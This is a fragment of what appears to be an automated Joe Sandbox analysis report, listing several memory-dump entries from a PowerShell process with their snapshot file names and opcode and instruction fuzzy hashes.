                                  • Source File: 00000002.00000002.1681294066.00007FFB4AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffb4ac60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5b254c75f771169b096177d58a158df313b1df4fb54ef45ede3a1f8979c1b463
                                  • Instruction ID: ed9add531872241d3df86280588d9410e36e79a5906b67d2048a6e8263a76baa
                                  • Opcode Fuzzy Hash: 5b254c75f771169b096177d58a158df313b1df4fb54ef45ede3a1f8979c1b463
                                  • Instruction Fuzzy Hash: 06C153E294EA8A4FE7E5EF7CCC156B57F94EF41B10B2804FAE44CC7483D919A8058382
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1681294066.00007FFB4AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffb4ac60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b61b10c4fb20164c26f6ec64bc75ff5cdd0c2bfad3c69c31a424f549d4a754e3
                                  • Instruction ID: 0b3389decfcfe0043e5127749232ac8cce3b162f134128fae45a2b8b902345f6
                                  • Opcode Fuzzy Hash: b61b10c4fb20164c26f6ec64bc75ff5cdd0c2bfad3c69c31a424f549d4a754e3
                                  • Instruction Fuzzy Hash: 4AA147A2A1DB864FE7E9EF3C9F151B57EC5EF95A10B2800FED44DC3593DD18A8058282
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1681294066.00007FFB4AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffb4ac60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1dcb56068dbba065be971ed8dd234ad0c2c818dfbbea1f235450c8915c2f2bae
                                  • Instruction ID: 7c69d7601233a120afb0f678434c154a7b67dba8fffeb4efc04d9237984e7072
                                  • Opcode Fuzzy Hash: 1dcb56068dbba065be971ed8dd234ad0c2c818dfbbea1f235450c8915c2f2bae
                                  • Instruction Fuzzy Hash: CB2129A2A0DB868FE3E5EF3C9F501757AC5EF95A10B6800F9D04CC3583DD1CAC058246
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1681294066.00007FFB4AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffb4ac60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3d4d5a81ba2bba5866a259e9659f14f109b9300ee023849c0a33287da8bc0745
                                  • Instruction ID: fdd5f452391756c1b3bcdce854817c2fc90a332d3f60751632a623f22f7fb4d1
                                  • Opcode Fuzzy Hash: 3d4d5a81ba2bba5866a259e9659f14f109b9300ee023849c0a33287da8bc0745
                                  • Instruction Fuzzy Hash: EE21CFD2E0EBC61FF3E5EE7C9C291646FD59F5AA52B1900FAD088CB493D80C18098352
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1681294066.00007FFB4AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffb4ac60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f1b202ee30c71e855c85d93a462f1bdfbb7ebc52e48d0472c3f5acd0bfff75d7
                                  • Instruction ID: 4bf818914cf7dc07965863eb4095eb805abc96f17daa6eb288435d114dbb7c1d
                                  • Opcode Fuzzy Hash: f1b202ee30c71e855c85d93a462f1bdfbb7ebc52e48d0472c3f5acd0bfff75d7
                                  • Instruction Fuzzy Hash: 191122F2A4D6868FE7D9EE7CC8502B87B91EF48700F2408FED48DC7883C929A8458351
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1681294066.00007FFB4AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffb4ac60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fd946d87b59b966f890ee414c8d2112db42ee079db004996b8825d2424e8b258
                                  • Instruction ID: 8134e909322420b7261af91c8fae2889e130eabae45eeb8f06a3931b789919f8
                                  • Opcode Fuzzy Hash: fd946d87b59b966f890ee414c8d2112db42ee079db004996b8825d2424e8b258
                                  • Instruction Fuzzy Hash: B401B58458E2C65FD753AB7848301A26FA48F13228B2800FBD0D9C60D3D90C145AC357
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1680923314.00007FFB4AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AB90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffb4ab90000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
                                  • Instruction ID: 20e8384b17ff374d5d7faf06dce1a730c0fc29ca1f58ec3204148c86ec976df9
                                  • Opcode Fuzzy Hash: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
                                  • Instruction Fuzzy Hash: F601A77010CB0C8FD744EF0CE091AA5B3E0FB99320F10056DE58AC3661D632E882CB41
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1681294066.00007FFB4AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AC60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffb4ac60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8ef6bed14aedf46128ba79f79e10fb0f5d23856a55e3de45ee609b579b36cf6e
                                  • Instruction ID: 19e51be26be4c09512e5d9e0848993482da4f1ee53514cd5dd4ba7bb3266df7f
                                  • Opcode Fuzzy Hash: 8ef6bed14aedf46128ba79f79e10fb0f5d23856a55e3de45ee609b579b36cf6e
                                  • Instruction Fuzzy Hash: F0018660A4D6C64FD357EB3899156697FA5AF83710F1842EEE0D9C60B3CA681845C712